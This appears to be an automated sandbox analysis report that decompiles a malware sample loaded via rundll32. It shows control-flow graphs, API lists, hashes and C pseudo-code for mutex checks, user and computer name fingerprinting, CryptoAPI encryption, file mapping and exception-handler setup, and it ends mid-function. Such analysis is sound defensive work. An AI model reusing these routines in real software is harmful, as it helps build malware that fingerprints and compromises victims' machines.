                                            control_flow_graph 0 581312e-5813177 RtlInitializeCriticalSection call 5811c01 3 5813179-581319d memset RtlInitializeCriticalSection 0->3 4 581319f-58131a1 0->4 5 58131a2-58131a8 3->5 4->5 6 58135aa-58135b4 5->6 7 58131ae-58131d2 CreateMutexA GetLastError 5->7 8 58131d4-58131d9 7->8 9 58131ef-58131f1 7->9 12 58131db-58131e8 CloseHandle 8->12 13 58131ed 8->13 10 58135a5 9->10 11 58131f7-5813202 call 5811777 9->11 15 58135a9 10->15 11->15 17 5813208-5813213 call 58135f7 11->17 12->10 13->9 15->6 17->15 20 5813219-581322b GetUserNameA 17->20 21 581322d-5813245 RtlAllocateHeap 20->21 22 581324f-581325f 20->22 21->22 23 5813247-581324d GetUserNameA 21->23 24 5813261-5813266 22->24 25 5813268-5813285 NtQueryInformationProcess 22->25 23->22 24->25 26 58132af-58132b9 24->26 27 5813287 25->27 28 581328b-581329a OpenProcess 25->28 29 58132f6-58132fa 26->29 30 58132bb-58132d7 GetShellWindow GetWindowThreadProcessId 26->30 27->28 31 58132a8-58132a9 CloseHandle 28->31 32 581329c-58132a1 GetLastError 28->32 36 58132fc-581330c memcpy 29->36 37 581330f-5813326 call 581b669 29->37 34 58132e9-58132f0 30->34 35 58132d9-58132df 30->35 31->26 32->26 33 58132a3 32->33 38 581333f-581337b call 5817c1e call 5806b6a call 5819c23 33->38 34->29 40 58132f2 34->40 35->34 39 58132e1-58132e7 35->39 36->37 45 5813333-5813339 37->45 46 5813328-581332c 37->46 53 5813391-58133a0 call 5815f92 38->53 54 581337d-581338c CreateEventA call 580c6b8 38->54 39->29 40->29 45->15 45->38 46->45 48 581332e call 581cb50 46->48 48->45 53->15 58 58133a6-58133b9 RtlAllocateHeap 53->58 54->53 58->15 59 58133bf-58133df OpenEventA 58->59 60 5813401-5813403 59->60 61 58133e1-58133f0 CreateEventA 59->61 63 5813404-581342b call 5816b34 60->63 62 58133f2-58133fc GetLastError 61->62 61->63 62->15 66 5813431-581343f 63->66 67 5813598-581359f 63->67 68 58134f1-58134f7 66->68 69 5813445-581345d call 5820a02 66->69 67->15 70 5813503-581350a 68->70 71 58134f9-58134fe call 581567e call 5805fc9 68->71 69->15 87 5813463-581346a 69->87 70->10 74 5813510-5813515 70->74 71->70 77 5813571-5813596 call 5816b34 74->77 78 5813517-581351d 74->78 77->67 88 58135a1-58135a2 77->88 82 581352c-5813542 RtlAllocateHeap 78->82 83 581351f-5813526 SetEvent 78->83 84 5813544-581356b wsprintfA 82->84 85 581356e-5813570 82->85 83->82 84->85 85->77 89 581346c-5813478 87->89 90 581347e-5813492 LoadLibraryA 87->90 88->10 89->90 91 58134c1-58134d4 call 5804df5 90->91 92 5813494-58134bc call 5801750 90->92 91->15 96 58134da-58134e3 91->96 92->91 96->70 97 58134e5-58134ef call 580e084 96->97 97->70
                                            APIs
                                            • RtlInitializeCriticalSection.NTDLL(05829448), ref: 0581314C
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 0581317D
                                            • RtlInitializeCriticalSection.NTDLL(05D7C2D0), ref: 0581318E
                                              • Part of subcall function 05811777: RtlInitializeCriticalSection.NTDLL(05829420), ref: 0581179B
                                              • Part of subcall function 05811777: RtlInitializeCriticalSection.NTDLL(05829400), ref: 058117B1
                                              • Part of subcall function 05811777: GetVersion.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117C2
                                              • Part of subcall function 05811777: GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117F6
                                              • Part of subcall function 058135F7: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 05813611
                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,0580BF69,?), ref: 058131B7
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058131C8
                                            • CloseHandle.KERNEL32(000005A8,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058131DC
                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 05813225
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05813238
                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 0581324D
                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0581327D
                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05813292
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581329C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058132A9
                                            • GetShellWindow.USER32 ref: 058132C4
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 058132CB
                                            • memcpy.NTDLL(05829314,?,00000018,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05813307
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,0580BF69,?), ref: 05813385
                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 058133AF
                                            • OpenEventA.KERNEL32(00100000,00000000,05D7B9C8,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058133D7
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000,05D7B9C8,?,?,?,?,?,?,?,0580BF69,?), ref: 058133EC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058133F2
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581348A
                                            • SetEvent.KERNEL32(?,05819CDB,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?), ref: 05813520
                                            • RtlAllocateHeap.NTDLL(00000000,00000043,05819CDB), ref: 05813535
                                            • wsprintfA.USER32 ref: 05813565
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                            • String ID:
                                            • API String ID: 3929413950-0
                                            • Opcode ID: c3a5c66595dd53de8f72586ee3e0ccb3f02de9ef610a41b254cb8e4fb95c57a0
                                            • Instruction ID: 0e29771809117c22ab6ac9fa2218162668954372aee7d3d2d86fff81728c93ea
                                            • Opcode Fuzzy Hash: c3a5c66595dd53de8f72586ee3e0ccb3f02de9ef610a41b254cb8e4fb95c57a0
                                            • Instruction Fuzzy Hash: 9AC16CB06143589FDB20AF66E84A96A7FEDFB84601F018C1DFD46C7250CF35A884CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3072 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 187 49f3072-49f30b2 CryptAcquireContextW 188 49f3209-49f320f GetLastError 187->188 189 49f30b8-49f30f4 memcpy CryptImportKey 187->189 190 49f3212-49f3219 188->190 191 49f30fa-49f310c CryptSetKeyParam 189->191 192 49f31f4-49f31fa GetLastError 189->192 193 49f3112-49f311b 191->193 194 49f31e0-49f31e6 GetLastError 191->194 195 49f31fd-49f3207 CryptReleaseContext 192->195 196 49f311d-49f311f 193->196 197 49f3123-49f3130 call 49f4df6 193->197 198 49f31e9-49f31f2 CryptDestroyKey 194->198 195->190 196->197 199 49f3121 196->199 202 49f31d7-49f31de 197->202 203 49f3136-49f313f 197->203 198->195 199->197 202->198 204 49f3142-49f314a 203->204 205 49f314f-49f316c memcpy 204->205 206 49f314c 204->206 207 49f316e-49f3185 CryptEncrypt 205->207 208 49f3187-49f3196 CryptDecrypt 205->208 206->205 209 49f319c-49f319e 207->209 208->209 210 49f31ae-49f31b9 GetLastError 209->210 211 49f31a0-49f31aa 209->211 213 49f31cd-49f31d5 call 49f4c73 210->213 214 49f31bb-49f31cb 210->214 211->204 212 49f31ac 211->212 212->214 213->198 214->198
                                            C-Code - Quality: 58%
                                            			E049F3072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x49fa0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x49fa0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E049F4DF6(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x49fa0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E049F4C73(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                            0x049f307b
                                            0x049f3081
                                            0x049f3084
                                            0x049f308a
                                            0x049f308a
                                            0x049f308c
                                            0x049f308e
                                            0x049f3091
                                            0x049f3097
                                            0x049f3098
                                            0x049f3099
                                            0x049f309f
                                            0x049f30a4
                                            0x049f30aa
                                            0x049f30b2
                                            0x049f320f
                                            0x049f30b8
                                            0x049f30ba
                                            0x049f30c3
                                            0x049f30c8
                                            0x049f30da
                                            0x049f30dd
                                            0x049f30e1
                                            0x049f30e8
                                            0x049f30ec
                                            0x049f30f4
                                            0x049f31fa
                                            0x049f30fa
                                            0x049f30fa
                                            0x049f30fe
                                            0x049f30ff
                                            0x049f3101
                                            0x049f310c
                                            0x049f31e6
                                            0x049f3112
                                            0x049f3112
                                            0x049f3115
                                            0x049f311b
                                            0x049f3121
                                            0x049f3121
                                            0x049f3129
                                            0x049f312b
                                            0x049f3130
                                            0x049f31d7
                                            0x049f3136
                                            0x049f313c
                                            0x049f313f
                                            0x049f3142
                                            0x049f3144
                                            0x049f3145
                                            0x049f314a
                                            0x049f314c
                                            0x049f314c
                                            0x049f3156
                                            0x049f315b
                                            0x049f315e
                                            0x049f3161
                                            0x049f3163
                                            0x049f316c
                                            0x049f3196
                                            0x049f316e
                                            0x049f317f
                                            0x049f317f
                                            0x049f319e
                                            0x00000000
                                            0x00000000
                                            0x049f31a0
                                            0x049f31a3
                                            0x049f31a6
                                            0x049f31aa
                                            0x00000000
                                            0x049f31ac
                                            0x049f31bb
                                            0x049f31c1
                                            0x049f31c9
                                            0x049f31c9
                                            0x00000000
                                            0x049f31aa
                                            0x049f31ae
                                            0x049f31b4
                                            0x049f31b9
                                            0x049f31d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f31b9
                                            0x049f3130
                                            0x049f31e9
                                            0x049f31ec
                                            0x049f31ec
                                            0x049f3201
                                            0x049f3201
                                            0x049f3219

                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,049F58B7), ref: 049F30AA
                                            • memcpy.NTDLL(?,049F58B7,00000010,?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90), ref: 049F30C3
                                            • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 049F30EC
                                            • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 049F3104
                                            • memcpy.NTDLL(00000000,049F6D90,049F58B7,0000011F), ref: 049F3156
                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,049F58B7,00000020,?,?,0000011F), ref: 049F317F
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,049F58B7,?,?,0000011F), ref: 049F3196
                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 049F31AE
                                            • GetLastError.KERNEL32 ref: 049F31E0
                                            • CryptDestroyKey.ADVAPI32(?), ref: 049F31EC
                                            • GetLastError.KERNEL32 ref: 049F31F4
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 049F3201
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90,049F58B7,?,049F58B7), ref: 049F3209
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                            • String ID:
                                            • API String ID: 1967744295-0
                                            • Opcode ID: ca002147fcf6af93da689b2d0ca69bfb717ff82b37d1b12bbc9c08bdb7568976
                                            • Instruction ID: 3e7c00129f23927e46cd2bc1dd730073eaba33bd70cd8195b3c23a85852be2ca
                                            • Opcode Fuzzy Hash: ca002147fcf6af93da689b2d0ca69bfb717ff82b37d1b12bbc9c08bdb7568976
                                            • Instruction Fuzzy Hash: 66513BB1A00209FFDB209FA5DC84EEE7BB9EB44354F044435FA15E6240D779AE54DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5410 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 74%
                                            			E049F5410(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L049F81C4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x49fa348; // 0x57d5a8
				_t5 = _t13 + 0x49fb87e; // 0x4f78e26
				_t6 = _t13 + 0x49fb59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L049F7E2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x49fa34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                            0x049f5410
                                            0x049f5418
                                            0x049f541c
                                            0x049f5422
                                            0x049f5427
                                            0x049f542c
                                            0x049f542f
                                            0x049f5432
                                            0x049f5437
                                            0x049f5438
                                            0x049f543b
                                            0x049f5440
                                            0x049f5447
                                            0x049f5451
                                            0x049f5453
                                            0x049f5454
                                            0x049f5457
                                            0x049f5473
                                            0x049f5479
                                            0x049f547d
                                            0x049f54cb
                                            0x049f547f
                                            0x049f548c
                                            0x049f549c
                                            0x049f54a4
                                            0x049f54b6
                                            0x049f54ba
                                            0x00000000
                                            0x00000000
                                            0x049f54a6
                                            0x049f54a9
                                            0x049f54ae
                                            0x049f54b0
                                            0x049f54b0
                                            0x049f548e
                                            0x049f5490
                                            0x049f54bc
                                            0x049f54bd
                                            0x049f54bd
                                            0x049f548c
                                            0x049f54d2

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?,?), ref: 049F541C
                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049F5432
                                            • _snwprintf.NTDLL ref: 049F5457
                                            • CreateFileMappingW.KERNELBASE(000000FF,049FA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 049F5473
                                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?), ref: 049F5485
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 049F549C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53), ref: 049F54BD
                                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?), ref: 049F54C5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                            • String ID:
                                            • API String ID: 1814172918-0
                                            • Opcode ID: 33f140fd82fe1b51d7d099aaffa5811756f5a3b55ae41b61003700700ab2ac20
                                            • Instruction ID: ea1d133f5a03c24a2bff079636c203a7ed029eac300f5de744de9a4ccfcf6047
                                            • Opcode Fuzzy Hash: 33f140fd82fe1b51d7d099aaffa5811756f5a3b55ae41b61003700700ab2ac20
                                            • Instruction Fuzzy Hash: 9321A2B2601214BBD711EF68DC09F9E7BB9EB84711F254031FA09EB291E674A904CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F12D3 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 396 49f12d3-49f12e7 397 49f12e9-49f12ee 396->397 398 49f12f1-49f1303 call 49f333b 396->398 397->398 401 49f1357-49f1364 398->401 402 49f1305-49f1315 GetUserNameW 398->402 403 49f1366-49f137d GetComputerNameW 401->403 402->403 404 49f1317-49f1327 RtlAllocateHeap 402->404 405 49f137f-49f1390 RtlAllocateHeap 403->405 406 49f13bb-49f13df 403->406 404->403 407 49f1329-49f1336 GetUserNameW 404->407 405->406 408 49f1392-49f139b GetComputerNameW 405->408 409 49f1338-49f1344 call 49f2087 407->409 410 49f1346-49f1355 HeapFree 407->410 411 49f139d-49f13a9 call 49f2087 408->411 412 49f13ac-49f13b5 HeapFree 408->412 409->410 410->403 411->412 412->406
                                            C-Code - Quality: 96%
                                            			E049F12D3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x49fa310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E049F333B( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x49fa344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x49fa2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E049F2087(_v8 + _v8, _t64);
							}
							HeapFree( *0x49fa2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x49fa2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E049F2087(_v8 + _v8, _t64);
						}
						HeapFree( *0x49fa2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                            0x049f12d3
                                            0x049f12db
                                            0x049f12df
                                            0x049f12e2
                                            0x049f12e7
                                            0x049f12e9
                                            0x049f12ee
                                            0x049f12ee
                                            0x049f12f4
                                            0x049f12f6
                                            0x049f1303
                                            0x049f1364
                                            0x049f1305
                                            0x049f130a
                                            0x049f1310
                                            0x049f1315
                                            0x049f1323
                                            0x049f1327
                                            0x049f1336
                                            0x049f133d
                                            0x049f1344
                                            0x049f1344
                                            0x049f134f
                                            0x049f134f
                                            0x049f1327
                                            0x049f1315
                                            0x049f1366
                                            0x049f136c
                                            0x049f1376
                                            0x049f1378
                                            0x049f137d
                                            0x049f138c
                                            0x049f1390
                                            0x049f139b
                                            0x049f13a2
                                            0x049f13a9
                                            0x049f13a9
                                            0x049f13b5
                                            0x049f13b5
                                            0x049f1390
                                            0x049f13c0
                                            0x049f13c2
                                            0x049f13c5
                                            0x049f13c7
                                            0x049f13ca
                                            0x049f13cd
                                            0x049f13d7
                                            0x049f13db
                                            0x049f13df

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F130A
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F1321
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F132E
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F134F
                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049F1376
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049F138A
                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049F1397
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F13B5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: HeapName$AllocateComputerFreeUser
                                            • String ID:
                                            • API String ID: 3239747167-0
                                            • Opcode ID: 8723b09a756c4da73a415b9a7dad4a06e78bf940c994e88dbbc6b2849231e055
                                            • Instruction ID: 2975bbd74eb8f9df4c2d7d55113e9ff518dfde15e22862e0edb02e065d38e27c
                                            • Opcode Fuzzy Hash: 8723b09a756c4da73a415b9a7dad4a06e78bf940c994e88dbbc6b2849231e055
                                            • Instruction Fuzzy Hash: 88312AB2A04205EFDB10DFA9DC81AAEBBF9FB48204F554079E944D3210EB74EE409B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580BE55 Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 479 580be55-580be67 480 580be71 479->480 481 580be69-580be6f 479->481 482 580be77-580be8b call 58013c3 480->482 481->482 485 580bec7-580bef1 call 58212f1 482->485 486 580be8d-580be9b StrRChrA 482->486 492 580bef3-580bef7 485->492 493 580bf0f-580bf17 485->493 487 580bea0 486->487 488 580be9d-580be9e 486->488 490 580bea6-580bec1 _strupr lstrlen call 5811c16 487->490 488->490 490->485 492->493 495 580bef9-580bf04 492->495 496 580bf19-580bf1c 493->496 497 580bf1e-580bf3c CreateEventA 493->497 495->493 499 580bf06-580bf0d 495->499 500 580bf7c-580bf83 496->500 501 580bf70-580bf76 GetLastError 497->501 502 580bf3e-580bf45 call 58137c5 497->502 499->493 499->499 503 580bf92-580bf97 500->503 504 580bf85-580bf8c RtlRemoveVectoredExceptionHandler 500->504 506 580bf78-580bf7a 501->506 502->501 508 580bf47-580bf4e 502->508 504->503 506->500 506->503 509 580bf50-580bf5c RtlAddVectoredExceptionHandler 508->509 510 580bf61-580bf64 call 581312e 508->510 509->510 512 580bf69-580bf6e 510->512 512->501 512->506
                                            APIs
                                            • StrRChrA.SHLWAPI(05D7B5B0,00000000,0000005C,?,?,?), ref: 0580BE91
                                            • _strupr.NTDLL ref: 0580BEA7
                                            • lstrlen.KERNEL32(05D7B5B0,?,?), ref: 0580BEAF
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 0580BF2F
                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,058196E0), ref: 0580BF56
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0580BF70
                                            • RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 0580BF86
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                            • String ID:
                                            • API String ID: 2251957091-0
                                            • Opcode ID: a3c4b55cc46011765bfc668ddd7049ff98eaf94077d8fe89c456c55b02388fe1
                                            • Instruction ID: 943049db062d07e7e19b748ef7a354dacdab336991d304f15420d1fc44b7f848
                                            • Opcode Fuzzy Hash: a3c4b55cc46011765bfc668ddd7049ff98eaf94077d8fe89c456c55b02388fe1
                                            • Instruction Fuzzy Hash: C731E772A242149FDB70AFBA9C8E96E7FA9BB04211F059465FD02D31D0DE346CC08F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4695 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 38%
                                            			E049F4695(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
